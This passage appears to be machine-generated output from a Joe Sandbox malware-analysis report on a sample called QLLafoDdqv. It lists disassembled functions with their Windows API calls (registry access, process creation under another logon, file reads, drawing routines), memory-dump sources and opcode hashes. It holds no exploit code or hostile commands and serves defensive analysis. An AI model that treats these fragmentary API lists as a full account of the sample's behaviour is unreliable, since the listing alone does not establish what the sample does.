              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
              • String ID:
              • API String ID: 1992179935-0
              • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
              • Instruction ID: f49cd91cffde22e3993c3d97fd14a2f106fb5a77b9949b683dd6bac3631d9c37
              • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
              • Instruction Fuzzy Hash: 2E810872A01B0ADBE7209F68CC45BAE73EAAF41734F24463EF651D62C1E778D9408790
              Function 007061FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006F82D9,006F82D9,?,?,?,0070644F,00000001,00000001,8BE85006), ref: 00706258
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0070644F,00000001,00000001,8BE85006,?,?,?), ref: 007062DE
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007063D8
              • __freea.LIBCMT ref: 007063E5
                • Part of subcall function 00703820: RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              • __freea.LIBCMT ref: 007063EE
              • __freea.LIBCMT ref: 00706413
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: af83f7516c0654e0fecd1d957314104961cf34eb2aa30535d4abe13ed594feda
              • Instruction ID: 8b64dd50df4397370da4e6f25fc985e084d4730df93016cf20860a7b9b143cdd
              • Opcode Fuzzy Hash: af83f7516c0654e0fecd1d957314104961cf34eb2aa30535d4abe13ed594feda
              • Instruction Fuzzy Hash: EC51AF72600216EBEB258F64CC95EBFB6E9EB44754F144729F905D61C1DB38DC60C6A0
              Function 0075BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 0075C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075B6AE,?,?), ref: 0075C9B5
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075C9F1
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA68
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075BCCA
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075BD25
              • RegCloseKey.ADVAPI32(00000000), ref: 0075BD6A
              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0075BD99
              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0075BDF3
              • RegCloseKey.ADVAPI32(?), ref: 0075BDFF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
              • String ID:
              • API String ID: 1120388591-0
              • Opcode ID: 72d3be956a6dcb29cf7800ed012f30b065f1ce44b8ed705b134658b1b2ea3d34
              • Instruction ID: d2654c93a04d55d8f3bc9f8b90b4b1613de51ef239718020df0784aef7d00bc5
              • Opcode Fuzzy Hash: 72d3be956a6dcb29cf7800ed012f30b065f1ce44b8ed705b134658b1b2ea3d34
              • Instruction Fuzzy Hash: 34818C30208341AFD715DF24C895E6ABBE5FF84308F14895DF8964B2A2DB75ED09CB92
              Function 0072F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(00000035), ref: 0072F7B9
              • SysAllocString.OLEAUT32(00000001), ref: 0072F860
              • VariantCopy.OLEAUT32(0072FA64,00000000), ref: 0072F889
              • VariantClear.OLEAUT32(0072FA64), ref: 0072F8AD
              • VariantCopy.OLEAUT32(0072FA64,00000000), ref: 0072F8B1
              • VariantClear.OLEAUT32(?), ref: 0072F8BB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$ClearCopy$AllocInitString
              • String ID:
              • API String ID: 3859894641-0
              • Opcode ID: cfb57628a9fb640819e94aa3dd7481cb340a5377d92fa589116c5c90239ff6bc
              • Instruction ID: 3fa2ff2b4617be4cf224a4d7478e514ae739d5d5904191b57e8f6754f3a75f48
              • Opcode Fuzzy Hash: cfb57628a9fb640819e94aa3dd7481cb340a5377d92fa589116c5c90239ff6bc
              • Instruction Fuzzy Hash: BB51D631501320FBCF10AB65E895B39B7B5EF45310B20947BE846DF295DB789C80CB6A
              Function 0074910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D7620: _wcslen.LIBCMT ref: 006D7625
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              • GetOpenFileNameW.COMDLG32(00000058), ref: 007494E5
              • _wcslen.LIBCMT ref: 00749506
              • _wcslen.LIBCMT ref: 0074952D
              • GetSaveFileNameW.COMDLG32(00000058), ref: 00749585
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$FileName$OpenSave
              • String ID: X
              • API String ID: 83654149-3081909835
              • Opcode ID: 8689acf0d6bac31f38d9da69065c90ae8cf3804fd9597974857a7527f00f3229
              • Instruction ID: 850dce11c78de4b7de1c64a23cf7f15604053cf3f47aa04a0c535898a727285d
              • Opcode Fuzzy Hash: 8689acf0d6bac31f38d9da69065c90ae8cf3804fd9597974857a7527f00f3229
              • Instruction Fuzzy Hash: CDE1AE31A083409FC764DF24C881A6BB7E1BF85314F14896DF9899B3A2EB35DD05CB96
              Function 006E920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • BeginPaint.USER32(?,?,?), ref: 006E9241
              • GetWindowRect.USER32(?,?), ref: 006E92A5
              • ScreenToClient.USER32(?,?), ref: 006E92C2
              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006E92D3
              • EndPaint.USER32(?,?,?,?,?), ref: 006E9321
              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007271EA
                • Part of subcall function 006E9339: BeginPath.GDI32(00000000), ref: 006E9357
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
              • String ID:
              • API String ID: 3050599898-0
              • Opcode ID: 38ea0b68587e41847d58a21dbd254755bf241000b0f46e1f5c7ee1a16015cdea
              • Instruction ID: 406f56c88ab487128e234f3c1157ec71c64a1cf9239508a59b34d8c4eb5b0573
              • Opcode Fuzzy Hash: 38ea0b68587e41847d58a21dbd254755bf241000b0f46e1f5c7ee1a16015cdea
              • Instruction Fuzzy Hash: 7941E030105340AFE711DF25DC84FBB7BA9EF86320F104229FAA5872E1C774A845DB66
              Function 007407EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
              Download Yara Rule
              APIs
              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0074080C
              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00740847
              • EnterCriticalSection.KERNEL32(?), ref: 00740863
              • LeaveCriticalSection.KERNEL32(?), ref: 007408DC
              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007408F3
              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00740921
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
              • String ID:
              • API String ID: 3368777196-0
              • Opcode ID: a8335e4c86517027f223620b37c6711a4ae58d348f5b3d6f065f9843ec3fde23
              • Instruction ID: 176038c1395d604e9a5befa5a508e98b62bc0755d1b71423d633178c50660099
              • Opcode Fuzzy Hash: a8335e4c86517027f223620b37c6711a4ae58d348f5b3d6f065f9843ec3fde23
              • Instruction Fuzzy Hash: 28419C71900205EFEF05AF54DC85A6A7779FF04300F1080A9EE00AA297DB74EE65DBA8
              Function 007681DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
              Download Yara Rule
              APIs
              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0072F3AB,00000000,?,?,00000000,?,0072682C,00000004,00000000,00000000), ref: 0076824C
              • EnableWindow.USER32(00000000,00000000), ref: 00768272
              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007682D1
              • ShowWindow.USER32(00000000,00000004), ref: 007682E5
              • EnableWindow.USER32(00000000,00000001), ref: 0076830B
              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0076832F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Show$Enable$MessageSend
              • String ID:
              • API String ID: 642888154-0
              • Opcode ID: 2ac1a5c29f5fe90d9aac1d4f4f798fbe6ce6075ddb300de8d99bb6ea6498d3be
              • Instruction ID: 496c3847ef0e472e8fc63a7f21895a7a5a06340e9cf15d6852dc64cdd15b8fdd
              • Opcode Fuzzy Hash: 2ac1a5c29f5fe90d9aac1d4f4f798fbe6ce6075ddb300de8d99bb6ea6498d3be
              • Instruction Fuzzy Hash: 7241E830601640EFDB56CF15C8A9BE87BE0FB46714F1843A9E94A4F272CB39A841CB46
              Function 00734C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
              Download Yara Rule
              APIs
              • IsWindowVisible.USER32(?), ref: 00734C95
              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00734CB2
              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00734CEA
              • _wcslen.LIBCMT ref: 00734D08
              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00734D10
              • _wcsstr.LIBVCRUNTIME ref: 00734D1A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
              • String ID:
              • API String ID: 72514467-0
              • Opcode ID: c6f299c3a6a5714df1f7c775347e62be22133b050a1753b64e178597bc7d7c19
              • Instruction ID: 652acf3116213d61dedf365a65aee826ed49ec27f3cca9cf57ff2e2045c466d2
              • Opcode Fuzzy Hash: c6f299c3a6a5714df1f7c775347e62be22133b050a1753b64e178597bc7d7c19
              • Instruction Fuzzy Hash: B2212932305304BBFB195B35EC09E7B7B9DDF45750F10806DF905CA192EEA9EC0086A4
              Function 0074581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D3A97,?,?,006D2E7F,?,?,?,00000000), ref: 006D3AC2
              • _wcslen.LIBCMT ref: 0074587B
              • CoInitialize.OLE32(00000000), ref: 00745995
              • CoCreateInstance.OLE32(0076FCF8,00000000,00000001,0076FB68,?), ref: 007459AE
              • CoUninitialize.OLE32 ref: 007459CC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
              • String ID: .lnk
              • API String ID: 3172280962-24824748
              • Opcode ID: c94bdcb5356e88c5c068ab8dba1a093f5b7c3958d45d01a1fe4b443b555559cf
              • Instruction ID: 34272237e39419d327b684f75dea15cc4c646b881185779a39875e0e21873e5a
              • Opcode Fuzzy Hash: c94bdcb5356e88c5c068ab8dba1a093f5b7c3958d45d01a1fe4b443b555559cf
              • Instruction Fuzzy Hash: 7ED143B1A08701DFC714DF24C48492ABBE6EF89710F14895DF88A9B362DB35EC45CB92
              Function 0073175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00730FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00730FCA
                • Part of subcall function 00730FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00730FD6
                • Part of subcall function 00730FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00730FE5
                • Part of subcall function 00730FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00730FEC
                • Part of subcall function 00730FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00731002
              • GetLengthSid.ADVAPI32(?,00000000,00731335), ref: 007317AE
              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007317BA
              • HeapAlloc.KERNEL32(00000000), ref: 007317C1
              • CopySid.ADVAPI32(00000000,00000000,?), ref: 007317DA
              • GetProcessHeap.KERNEL32(00000000,00000000,00731335), ref: 007317EE
              • HeapFree.KERNEL32(00000000), ref: 007317F5
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
              • String ID:
              • API String ID: 3008561057-0
              • Opcode ID: ef3157d1178847a0f2e254d23b2e48c8bef6dc1568ed7cfab561c10aea7ddfd2
              • Instruction ID: ce9f4102562c6a17b14b863ccf99e89bef7022874a9e246e2233330f1cbae1e7
              • Opcode Fuzzy Hash: ef3157d1178847a0f2e254d23b2e48c8bef6dc1568ed7cfab561c10aea7ddfd2
              • Instruction Fuzzy Hash: FC11BE71500205FFEB259FA4CC49BBE7BA9EB42355F588018F48297212D77AAD44CB70
              Function 007314CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
              Download Yara Rule
              APIs
              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007314FF
              • OpenProcessToken.ADVAPI32(00000000), ref: 00731506
              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00731515
              • CloseHandle.KERNEL32(00000004), ref: 00731520
              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0073154F
              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00731563
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
              • String ID:
              • API String ID: 1413079979-0
              • Opcode ID: 30ace8396ff4b67202ace4f4f5582e1ac98434b35af4cc632e69d70966ce7b31
              • Instruction ID: 7752e96556bf7098752836b9a4189164ee6656ee30418db30c411410b39aff72
              • Opcode Fuzzy Hash: 30ace8396ff4b67202ace4f4f5582e1ac98434b35af4cc632e69d70966ce7b31
              • Instruction Fuzzy Hash: E9116A7250024DEBEF128F98DD49FEE7BA9EF48744F048015FA06A2160C3B9CE60DB60
              Function 006F3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,006F3379,006F2FE5), ref: 006F3390
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006F339E
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006F33B7
              • SetLastError.KERNEL32(00000000,?,006F3379,006F2FE5), ref: 006F3409
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: 5e8d5aa230d56d240fcb7788c7ad66c8a91b4fbc19379eb3681a03ceac465f8e
              • Instruction ID: 9529aa9e34b84ad00dae042c4f8f1d4d761b0bd74a4551f670112d56e64e3996
              • Opcode Fuzzy Hash: 5e8d5aa230d56d240fcb7788c7ad66c8a91b4fbc19379eb3681a03ceac465f8e
              • Instruction Fuzzy Hash: 35012433208339BEAA2627787C85AB72A96EB15379B20422EF710C43F0EF554D12514C
              Function 00702D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,00705686,00713CD6,?,00000000,?,00705B6A,?,?,?,?,?,006FE6D1,?,00798A48), ref: 00702D78
              • _free.LIBCMT ref: 00702DAB
              • _free.LIBCMT ref: 00702DD3
              • SetLastError.KERNEL32(00000000,?,?,?,?,006FE6D1,?,00798A48,00000010,006D4F4A,?,?,00000000,00713CD6), ref: 00702DE0
              • SetLastError.KERNEL32(00000000,?,?,?,?,006FE6D1,?,00798A48,00000010,006D4F4A,?,?,00000000,00713CD6), ref: 00702DEC
              • _abort.LIBCMT ref: 00702DF2
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 1bf2c61ca496c118ac84d8d4ab22444a04b3b128eba0b0ea8065ae74983b2727
              • Instruction ID: 6cfdca0e940aa55a786ef650f56660886d82423e6a7976676cc39de376e08ec3
              • Opcode Fuzzy Hash: 1bf2c61ca496c118ac84d8d4ab22444a04b3b128eba0b0ea8065ae74983b2727
              • Instruction Fuzzy Hash: 40F0A477644600F7C6137735AC0EA2A26D9AFC27A5B358719F825922E3EE6C9C034165
              Function 00768A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E9693
                • Part of subcall function 006E9639: SelectObject.GDI32(?,00000000), ref: 006E96A2
                • Part of subcall function 006E9639: BeginPath.GDI32(?), ref: 006E96B9
                • Part of subcall function 006E9639: SelectObject.GDI32(?,00000000), ref: 006E96E2
              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00768A4E
              • LineTo.GDI32(?,00000003,00000000), ref: 00768A62
              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00768A70
              • LineTo.GDI32(?,00000000,00000003), ref: 00768A80
              • EndPath.GDI32(?), ref: 00768A90
              • StrokePath.GDI32(?), ref: 00768AA0
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
              • String ID:
              • API String ID: 43455801-0
              • Opcode ID: f550b3b9478693dd57922e8204f6d2f56b350bbdddb44621cd323f9a5b4d8501
              • Instruction ID: 52592dd170973d18b7b48f2c46c376cab8ae405443b3a318e06d09a373665f71
              • Opcode Fuzzy Hash: f550b3b9478693dd57922e8204f6d2f56b350bbdddb44621cd323f9a5b4d8501
              • Instruction Fuzzy Hash: 6011FA7600024CFFEB129F94DC48EAA7F6DEB08350F00C012FA5699161C7759D55DBA4
              Function 007351FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
              Download Yara Rule
              APIs
              • GetDC.USER32(00000000), ref: 00735218
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00735229
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00735230
              • ReleaseDC.USER32(00000000,00000000), ref: 00735238
              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0073524F
              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00735261
